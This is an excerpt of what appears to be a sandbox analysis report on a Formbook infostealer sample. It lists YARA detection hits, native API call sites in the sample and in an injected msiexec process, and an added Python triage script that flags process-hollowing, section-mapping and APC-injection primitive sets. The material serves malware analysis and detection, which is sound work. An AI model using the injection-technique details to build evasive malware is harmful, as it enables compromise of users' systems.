Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.909537061.0000000000610000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.668734008.00000000039F9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.g1EhgmCqCD.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.g1EhgmCqCD.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_004181B0 NtCreateFile
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00418260 NtReadFile
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_004182E0 NtClose
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00418390 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00418392 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C95D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9540 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C98F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A00 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C99D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C95F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CAD30 NtSetContextThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9520 NtWaitForSingleObject
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9950 NtQueueApcThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9560 NtWriteFile
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9820 NtEnumerateKey
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CB040 NtSuspendThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CA3B0 NtGetContextThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CA710 NtOpenProcessToken
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9B00 NtSetValueKey
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9730 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9770 NtSetInformationFile
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019CA770 NtOpenThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9760 NtOpenProcess
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A80 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C96D0 NtCreateKey
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9610 NtEnumerateValueKey
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9A10 NtQuerySection
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9650 NtQueryValueKey
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019C9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9860 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9840 NtDelayExecution,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC95D0 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9540 NtReadFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9910 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC96E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC96D0 NtCreateKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9660 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9650 NtQueryValueKey,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9FE0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9710 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC98F0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECB040 NtSuspendThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9820 NtEnumerateKey
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC95F0 NtQueryInformationFile
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC99D0 NtCreateProcessEx
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9560 NtWriteFile
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9520 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A80 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9670 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A20 NtResumeThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A00 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9610 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9A10 NtQuerySection
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECA3B0 NtGetContextThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9760 NtOpenProcess
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9770 NtSetInformationFile
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECA770 NtOpenThread
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9730 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EC9B00 NtSetValueKey
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00ECA710 NtOpenProcessToken
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E81B0 NtCreateFile
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E8260 NtReadFile
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E82E0 NtClose
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E8390 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001E8392 NtAllocateVirtualMemory
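The entries above are call sites that the sandbox's disassembly found in memory dumps of process 3 (the second g1EhgmCqCD.exe) and process 9 (msiexec.exe). They show which native primitives the unpacked code can reach; the behaviour signatures elsewhere in the report are what say the injection actually ran. Two things are worth extracting from the list mechanically. First, the primitive sets for process hollowing (NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread), remote section mapping (NtOpenProcess, NtCreateSection, NtMapViewOfSection) and APC injection (NtOpenThread, NtWriteVirtualMemory, NtQueueApcThread) are all complete in both processes. Second, every 0x019C... call site in process 3 has a twin in process 9 exactly 0xB00000 lower (0x019C99A0 vs 0x00EC99A0, 0x019CAD30 vs 0x00ECAD30, and so on), and the 0x0041... sites have twins at 0x001E... (delta 0x230000, matching the 0x400000 and 0x1D0000 dump bases the Yara hits name), so the same two code regions are mapped in both processes at different bases. That the Nt* stubs sit next to LdrInitializeThunk in a region whose dump carries OriginalFilename ntdll.dll is consistent with a privately mapped copy of ntdll used to sidestep user-mode hooks, but that is an inference from the addresses, not something the report states.

The following Python is an added example and not part of the Joe Sandbox report. It parses lines in the report's own notation (a constructed subset is embedded), groups the Nt* call sites per process index (the first number, which is Joe Sandbox's process index rather than the OS PID), names the injection techniques whose primitive set is complete, and counts the base deltas between two processes. The technique-to-primitive mapping is this example's own, not the sandbox's signature logic.

```python
"""Added example, not part of the Joe Sandbox report: group the report's
native-API call sites per process, name the injection techniques whose
primitive set is complete, and measure the base delta between processes."""
import re
from collections import Counter, defaultdict

# Constructed input: a subset of the report's own "Code function" entries in
# its "<process index>_<run>_<address> <Api>,<Api>" notation. The first number
# is Joe Sandbox's process index, not the OS PID. The first line has no Nt*
# call and is ignored by the parser.
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 1_2_00CAB264
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_004181B0 NtCreateFile
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C97A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C9A20 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019CAD30 NtSetContextThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C9950 NtQueueApcThread
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C98A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019C9760 NtOpenProcess
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe Code function: 3_2_019CA770 NtOpenThread
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC99A0 NtCreateSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC9780 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC97A0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC9A20 NtResumeThread
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC9A50 NtCreateFile,LdrInitializeThunk
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00ECAD30 NtSetContextThread
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC9950 NtQueueApcThread
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC98A0 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00EC9760 NtOpenProcess
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_00ECA770 NtOpenThread
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 9_2_001E81B0 NtCreateFile
"""

# process index, run number, call-site address, comma-separated names that follow
CALL_RE = re.compile(r"\b(\d+)_\d+_([0-9A-Fa-f]{8})[ \t]+([A-Za-z,]+)")

# Primitive sets this example treats as sufficient for each technique; the
# mapping is the example's own, not the sandbox's signature logic.
TECHNIQUES = {
    "process hollowing": {"NtUnmapViewOfSection", "NtWriteVirtualMemory",
                          "NtSetContextThread", "NtResumeThread"},
    "remote section mapping": {"NtOpenProcess", "NtCreateSection", "NtMapViewOfSection"},
    "APC injection": {"NtOpenThread", "NtWriteVirtualMemory", "NtQueueApcThread"},
}


def parse_native_calls(text):
    """Return {process index: {Nt* name: {call-site address, ...}}}."""
    calls = defaultdict(lambda: defaultdict(set))
    for m in CALL_RE.finditer(text):
        index, addr = int(m.group(1)), int(m.group(2), 16)
        for name in m.group(3).split(","):
            if name.startswith("Nt"):
                calls[index][name].add(addr)
    return calls


def flag_injection(calls):
    """Name every technique whose full primitive set a process can reach."""
    return {index: sorted(t for t, needed in TECHNIQUES.items() if needed <= set(names))
            for index, names in calls.items()}


def relocation_deltas(calls, index_a, index_b):
    """Pair call sites of the same API at the same offset below a 64 KiB boundary
    in two processes and count how many pairs share each base delta. One delta
    covering many pairs means the same code is mapped in both at different bases."""
    def sites(index):
        return {(name, addr & 0xFFFF): addr
                for name, addrs in calls[index].items() for addr in addrs}
    a, b = sites(index_a), sites(index_b)
    return dict(Counter(a[k] - b[k] for k in a.keys() & b.keys()))


if __name__ == "__main__":
    calls = parse_native_calls(REPORT_LINES)
    for index, techniques in sorted(flag_injection(calls).items()):
        print(f"process {index}: {', '.join(techniques) or 'no complete injection set'}")
    for delta, n in relocation_deltas(calls, 3, 9).items():
        print(f"{n} call sites in process 3 sit 0x{delta:08X} above their twins in process 9")
```

Run against the full report text the same parser works unchanged, because the trailing duplicate identifier on each original line (for example ",3_2_019C99A0") is not a letter sequence and is simply not captured. The delta check is the part worth keeping in a triage toolbox: two processes whose call sites line up at one constant offset share an image, which is the quickest confirmation that process 9 is running the same payload that was unpacked in process 3.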
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CAB264
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CAC2B0
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CA9990
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_00CADF71
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_04F77B3C
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 1_2_04F7A2D6
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00401030
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041B944
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041BB84
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00408C4B
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00408C50
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041BCF5
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041C5ED
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00402D90
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0041B70F
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_00402FB0
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019B2581
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A525DD
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0199D5E0
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0198F900
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A52D07
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01980D20
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019A4120
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A51D55
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0199B090
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A520A8
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019B20A0
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A528EC
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_0199841F
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A41002
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019BEBB0
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A51FF1
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A4DBD2
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A52B28
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A522AE
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_01A52EF7
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: 3_2_019A6E30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F528EC
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EB20A0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F520A8
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E9B090
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F4D466
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F41002
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E9841F
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E9D5E0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F525DD
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EB2581
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F51D55
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E80D20
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EA4120
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00E8F900
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F52D07
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F52EF7
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F522AE
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EA6E30
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F51FF1
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F4DBD2
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00EBEBB0
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_00F52B28
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EB944
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EBB84
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D8C50
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D8C4B
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EBCF5
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D2D90
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001EC5ED
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 9_2_001D2FB0
Source: C:\Users\user\Desktop\g1EhgmCqCD.exe | Code function: String function: 0198B150 appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: String function: 00E8B150 appears 35 times
Source: g1EhgmCqCD.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: g1EhgmCqCD.exe | Binary or memory string: OriginalFilename vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000001.00000000.643686589.00000000005B2000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000001.00000002.667518282.0000000000CB0000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000001.00000002.673721469.00000000072E0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000001.00000002.672157538.0000000005AB0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameIEFRAME.DLLD vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000001.00000002.672229683.0000000005B30000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000001.00000002.675343588.0000000008E80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe | Binary or memory string: OriginalFilename vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000003.00000000.665930767.0000000000E62000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000003.00000002.736288628.000000000379F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamemsiexec.exeX vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe, 00000003.00000002.728784074.0000000001A7F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs g1EhgmCqCD.exe
Source: g1EhgmCqCD.exe | Binary or memory string: OriginalFilenameOnSerializedAttribute.exeB vs g1EhgmCqCD.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: g1EhgmCqCD.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.726897385.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.908953475.00000000001D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.728400574.00000000018A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.909434155.0000000000550000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.728247735.0000000001870000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
